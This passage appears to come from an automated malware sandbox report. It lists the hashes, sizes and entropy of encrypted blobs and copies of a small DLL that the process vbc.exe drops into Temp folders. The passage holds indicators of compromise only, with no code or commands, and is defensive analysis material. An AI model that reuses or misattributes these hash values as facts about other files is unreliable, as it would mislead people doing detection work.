                            Category:dropped
                            Size (bytes):5364
                            Entropy (8bit):5.098453976752756
                            Encrypted:false
                            SSDEEP:48:TFN/+0qkbwa4ukzw+Lv6J74aELf2ZyF7WAxdu9vsnvRo9zxDLcbKO+DM77iEKY7E:TXxqkT0L674zLWiPxdF1v+D67Dh/7m
                            MD5:924FE3C770633DAAC8AB79E60CB251D5
                            SHA1:A228F5C0B6BE4770CEE6FF522A21B1E5F5E5E242
                            SHA-256:D65D822347BE3E1937D89689BBFFE3FFA9CC9B5290B837763A3FDB3A2A92DC0F
                            SHA-512:42C35B3E47388DD04F0C31AC8837257DE134C2E2A7201148A002E847A538CFE283D05A850129F9D41187A8A0D817513367F721CDEC9F879EBB915477E530C376
                            Malicious:false
                            C:\Users\user\AppData\Local\Temp\9cmllaqc7s94x5clckyk
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):545280
                            Entropy (8bit):7.999676672972768
                            Encrypted:true
                            SSDEEP:12288:ua+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/YY:u1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2v
                            MD5:60A6F9CCF51F1CF87DF77D7ED38D3A2D
                            SHA1:D2D2DB15BE59C9965C6FBAAF3B641E16CA1C5734
                            SHA-256:67AB7D3DACF71D9FDE987CB11C135ECF3098D9E568DA6C14D63D50D96A5C9603
                            SHA-512:366B07C3E35FAAE1D4739E9C250A5B59C4D443B06E5691C1A6E6E093EA3897C4EC4F64ACB70E9396B22834332DA5CDE4CE45DD598B31DFE83104CB214439FBE1
                            Malicious:true
                            C:\Users\user\AppData\Local\Temp\nsc26D3.tmp
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):561231
                            Entropy (8bit):7.991520357518498
                            Encrypted:true
                            SSDEEP:12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
                            MD5:9968913B09E0208F6A9CE25397E106A3
                            SHA1:5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
                            SHA-256:C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
                            SHA-512:45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
                            Malicious:false
                            C:\Users\user\AppData\Local\Temp\nsc6BC0.tmp\lk95ejdjuy.dll
                            Process:C:\Users\Public\vbc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):4.462434595158862
                            Encrypted:false
                            SSDEEP:96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
                            MD5:024BBA8A78668315098F21E6E6870F2E
                            SHA1:13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
                            SHA-256:6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
                            SHA-512:EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
                            Malicious:false
                            C:\Users\user\AppData\Local\Temp\nsc81D.tmp
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):561231
                            Entropy (8bit):7.991520357518498
                            Encrypted:true
                            SSDEEP:12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
                            MD5:9968913B09E0208F6A9CE25397E106A3
                            SHA1:5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
                            SHA-256:C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
                            SHA-512:45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
                            Malicious:false
                            C:\Users\user\AppData\Local\Temp\nsc8A9.tmp
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):561231
                            Entropy (8bit):7.991520357518498
                            Encrypted:true
                            SSDEEP:12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
                            MD5:9968913B09E0208F6A9CE25397E106A3
                            SHA1:5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
                            SHA-256:C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
                            SHA-512:45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
                            Malicious:false
                            C:\Users\user\AppData\Local\Temp\nscBA5B.tmp
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):561231
                            Entropy (8bit):7.991520357518498
                            Encrypted:true
                            SSDEEP:12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
                            MD5:9968913B09E0208F6A9CE25397E106A3
                            SHA1:5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
                            SHA-256:C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
                            SHA-512:45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
                            Malicious:false
                            C:\Users\user\AppData\Local\Temp\nscF0A7.tmp
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):561231
                            Entropy (8bit):7.991520357518498
                            Encrypted:true
                            SSDEEP:12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
                            MD5:9968913B09E0208F6A9CE25397E106A3
                            SHA1:5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
                            SHA-256:C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
                            SHA-512:45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
                            Malicious:false
                            C:\Users\user\AppData\Local\Temp\nsh1E7A.tmp
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):561231
                            Entropy (8bit):7.991520357518498
                            Encrypted:true
                            SSDEEP:12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
                            MD5:9968913B09E0208F6A9CE25397E106A3
                            SHA1:5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
                            SHA-256:C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
                            SHA-512:45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
                            Malicious:false
                            C:\Users\user\AppData\Local\Temp\nsh3A82.tmp
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):561231
                            Entropy (8bit):7.991520357518498
                            Encrypted:true
                            SSDEEP:12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
                            MD5:9968913B09E0208F6A9CE25397E106A3
                            SHA1:5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
                            SHA-256:C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
                            SHA-512:45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
                            Malicious:false
                            C:\Users\user\AppData\Local\Temp\nsh3B1F.tmp\lk95ejdjuy.dll
                            Process:C:\Users\Public\vbc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):4.462434595158862
                            Encrypted:false
                            SSDEEP:96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
                            MD5:024BBA8A78668315098F21E6E6870F2E
                            SHA1:13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
                            SHA-256:6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
                            SHA-512:EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
                            Malicious:false
                            C:\Users\user\AppData\Local\Temp\nsh6AF4.tmp
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):561231
                            Entropy (8bit):7.991520357518498
                            Encrypted:true
                            SSDEEP:12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
                            MD5:9968913B09E0208F6A9CE25397E106A3
                            SHA1:5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
                            SHA-256:C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
                            SHA-512:45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
                            Malicious:false
                            C:\Users\user\AppData\Local\Temp\nshA094.tmp
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):561231
                            Entropy (8bit):7.991520357518498
                            Encrypted:true
                            SSDEEP:12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
                            MD5:9968913B09E0208F6A9CE25397E106A3
                            SHA1:5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
                            SHA-256:C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
                            SHA-512:45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
                            Malicious:false
                            C:\Users\user\AppData\Local\Temp\nshD819.tmp\lk95ejdjuy.dll
                            Process:C:\Users\Public\vbc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):4.462434595158862
                            Encrypted:false
                            SSDEEP:96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
                            MD5:024BBA8A78668315098F21E6E6870F2E
                            SHA1:13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
                            SHA-256:6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
                            SHA-512:EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
                            Malicious:false
                            C:\Users\user\AppData\Local\Temp\nshF115.tmp\lk95ejdjuy.dll
                            Process:C:\Users\Public\vbc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):4.462434595158862
                            Encrypted:false
                            SSDEEP:96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
                            MD5:024BBA8A78668315098F21E6E6870F2E
                            SHA1:13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
                            SHA-256:6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
                            SHA-512:EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
                            Malicious:false
                            C:\Users\user\AppData\Local\Temp\nsm1EE8.tmp\lk95ejdjuy.dll
                            Process:C:\Users\Public\vbc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):4.462434595158862
                            Encrypted:false
                            SSDEEP:96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
                            MD5:024BBA8A78668315098F21E6E6870F2E
                            SHA1:13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
                            SHA-256:6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
                            SHA-512:EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
                            Malicious:false
                            C:\Users\user\AppData\Local\Temp\nsmB923.tmp
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):561231
                            Entropy (8bit):7.991520357518498
                            Encrypted:true
                            SSDEEP:12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
                            MD5:9968913B09E0208F6A9CE25397E106A3
                            SHA1:5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
                            SHA-256:C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
                            SHA-512:45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
                            Malicious:false
                            C:\Users\user\AppData\Local\Temp\nsmCEF3.tmp
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):561231
                            Entropy (8bit):7.991520357518498
                            Encrypted:true
                            SSDEEP:12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
                            MD5:9968913B09E0208F6A9CE25397E106A3
                            SHA1:5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
                            SHA-256:C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
                            SHA-512:45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
                            Malicious:false
                            C:\Users\user\AppData\Local\Temp\nsmCF90.tmp\lk95ejdjuy.dll
                            Process:C:\Users\Public\vbc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):4.462434595158862
                            Encrypted:false
                            SSDEEP:96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
                            MD5:024BBA8A78668315098F21E6E6870F2E
                            SHA1:13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
                            SHA-256:6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
                            SHA-512:EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
                            Malicious:false
                            C:\Users\user\AppData\Local\Temp\nsn2761.tmp\lk95ejdjuy.dll
                            Process:C:\Users\Public\vbc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):4.462434595158862
                            Encrypted:false
                            SSDEEP:96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
                            MD5:024BBA8A78668315098F21E6E6870F2E
                            SHA1:13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
                            SHA-256:6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
                            SHA-512:EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
                            Malicious:false
                            C:\Users\user\AppData\Local\Temp\nsn86CF.tmp\lk95ejdjuy.dll
                            Process:C:\Users\Public\vbc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):4.462434595158862
                            Encrypted:false
                            SSDEEP:96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
                            MD5:024BBA8A78668315098F21E6E6870F2E
                            SHA1:13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
                            SHA-256:6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
                            SHA-512:EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
                            Malicious:false
                            C:\Users\user\AppData\Local\Temp\nsn937.tmp\lk95ejdjuy.dll
                            Process:C:\Users\Public\vbc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):4.462434595158862
                            Encrypted:false
                            SSDEEP:96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
                            MD5:024BBA8A78668315098F21E6E6870F2E
                            SHA1:13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
                            SHA-256:6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
                            SHA-512:EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
                            Malicious:false
                            C:\Users\user\AppData\Local\Temp\nsnBAE9.tmp\lk95ejdjuy.dll
                            Process:C:\Users\Public\vbc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):4.462434595158862
                            Encrypted:false
                            SSDEEP:96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
                            MD5:024BBA8A78668315098F21E6E6870F2E
                            SHA1:13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
                            SHA-256:6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
                            SHA-512:EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
                            Malicious:false
                            C:\Users\user\AppData\Local\Temp\nsnEF02.tmp
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):561231
                            Entropy (8bit):7.991520357518498
                            Encrypted:true
                            SSDEEP:12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
                            MD5:9968913B09E0208F6A9CE25397E106A3
                            SHA1:5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
                            SHA-256:C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
                            SHA-512:45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
                            Malicious:false
                            C:\Users\user\AppData\Local\Temp\nsnEF9F.tmp\lk95ejdjuy.dll
                            Process:C:\Users\Public\vbc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):4.462434595158862
                            Encrypted:false
                            SSDEEP:96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
                            MD5:024BBA8A78668315098F21E6E6870F2E
                            SHA1:13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
                            SHA-256:6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
                            SHA-512:EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
                            Malicious:false
                            C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp\lk95ejdjuy.dll
                            Process:C:\Users\Public\vbc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):4.462434595158862
                            Encrypted:false
                            SSDEEP:96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
                            MD5:024BBA8A78668315098F21E6E6870F2E
                            SHA1:13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
                            SHA-256:6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
                            SHA-512:EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
                            Malicious:false
                            C:\Users\user\AppData\Local\Temp\nsrD7BA.tmp
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):561231
                            Entropy (8bit):7.991520357518498
                            Encrypted:true
                            SSDEEP:12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
                            MD5:9968913B09E0208F6A9CE25397E106A3
                            SHA1:5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
                            SHA-256:C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
                            SHA-512:45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
                            Malicious:false
                            C:\Users\user\AppData\Local\Temp\nss53BD.tmp
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):561231
                            Entropy (8bit):7.991520357518498
                            Encrypted:true
                            SSDEEP:12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
                            MD5:9968913B09E0208F6A9CE25397E106A3
                            SHA1:5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
                            SHA-256:C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
                            SHA-512:45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
                            Malicious:false
                            C:\Users\user\AppData\Local\Temp\nss87C.tmp\lk95ejdjuy.dll
                            Process:C:\Users\Public\vbc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):4.462434595158862
                            Encrypted:false
                            SSDEEP:96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
                            MD5:024BBA8A78668315098F21E6E6870F2E
                            SHA1:13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
                            SHA-256:6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
                            SHA-512:EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
                            Malicious:false
                            C:\Users\user\AppData\Local\Temp\nssD5D7.tmp
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):561231
                            Entropy (8bit):7.991520357518498
                            Encrypted:true
                            SSDEEP:12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
                            MD5:9968913B09E0208F6A9CE25397E106A3
                            SHA1:5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
                            SHA-256:C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
                            SHA-512:45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
                            Malicious:false
                            C:\Users\user\AppData\Local\Temp\nsx542B.tmp\lk95ejdjuy.dll
                            Process:C:\Users\Public\vbc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):4.462434595158862
                            Encrypted:false
                            SSDEEP:96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
                            MD5:024BBA8A78668315098F21E6E6870F2E
                            SHA1:13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
                            SHA-256:6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
                            SHA-512:EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
                            Malicious:false
                            C:\Users\user\AppData\Local\Temp\nsx8670.tmp
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):561231
                            Entropy (8bit):7.991520357518498
                            Encrypted:true
                            SSDEEP:12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
                            MD5:9968913B09E0208F6A9CE25397E106A3
                            SHA1:5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
                            SHA-256:C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
                            SHA-512:45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
                            Malicious:false
                            C:\Users\user\AppData\Local\Temp\nsxA0F3.tmp\lk95ejdjuy.dll
                            Process:C:\Users\Public\vbc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):4.462434595158862
                            Encrypted:false
                            SSDEEP:96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
                            MD5:024BBA8A78668315098F21E6E6870F2E
                            SHA1:13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
                            SHA-256:6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
                            SHA-512:EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
                            Malicious:false
                            C:\Users\user\AppData\Local\Temp\nsxD645.tmp\lk95ejdjuy.dll
                            Process:C:\Users\Public\vbc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):4.462434595158862
                            Encrypted:false
                            SSDEEP:96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
                            MD5:024BBA8A78668315098F21E6E6870F2E
                            SHA1:13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
                            SHA-256:6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
